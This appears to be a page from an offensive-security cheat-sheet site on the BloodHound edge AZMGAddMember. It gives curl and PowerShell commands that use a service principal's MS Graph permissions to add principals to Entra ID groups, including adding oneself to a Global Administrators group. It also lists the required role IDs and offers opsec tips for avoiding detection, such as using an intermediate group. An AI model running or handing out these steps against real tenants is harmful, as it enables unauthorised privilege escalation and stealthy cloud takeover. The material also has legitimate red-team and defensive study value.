🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / AZMGAddMember

AZMGAddMember

The source service principal has been granted an MS Graph app role that allows it to add members to groups (GroupMember.ReadWrite.All or equivalent), enabling group membership manipulation via the MS Graph API.

Applies to: AZServicePrincipal β†’ AZGroup (via MS Graph API)

Linux Abuse

Get client credentials token

TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

Add principal to group (Graph API)

curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/members/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Add to role-assignable group (requires RoleManagement.ReadWrite.Directory)

# Same endpoint β€” works if SP also holds the RoleManagement role
curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/members/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Windows Abuse

BARK β€” get token and add member

$MGToken = Get-MSGraphTokenWithClientCredentials `
  -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `
  -ClientSecret "asdf..." `
  -TenantName "contoso.onmicrosoft.com"

Add-AZMemberToGroup `
  -PrincipalID "<object-id>" `
  -TargetGroupId "<target-group-id>" `
  -Token $MGToken.access_token

Microsoft.Graph PowerShell

Connect-MgGraph -AccessToken <access-token>
New-MgGroupMember -GroupId <target-group-id> -DirectoryObjectId <object-id>

Add self to Global Admin group (if role-assignable group exists)

# Find Global Administrators role-assignable group
$group = Get-MgGroup -Filter "isAssignableToRole eq true and displayName eq 'Global Administrators'"
New-MgGroupMember -GroupId $group.Id -DirectoryObjectId <object-id>

Required App Roles (MS Graph)

Permission App Role ID
GroupMember.ReadWrite.All dbaae8cf-10b5-4b86-a4a1-f871c94c6695
Group.ReadWrite.All 62a82d76-70ea-41e2-9197-370581804d09
Directory.ReadWrite.All 19dbc75e-c2e2-444c-a770-ec69d8559fc7
RoleManagement.ReadWrite.Directory (role-assignable groups) 9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8

Opsec

  • Entra ID audit log records: actor SP, target group, added principal, timestamp.
  • This capability is not visible in Azure Portal β€” requires checking audit logs or API inspection.
  • Adding self to a privileged group is high-signal; prefer adding to an intermediate group.
  • client_credentials token acquisition does not generate interactive sign-in events.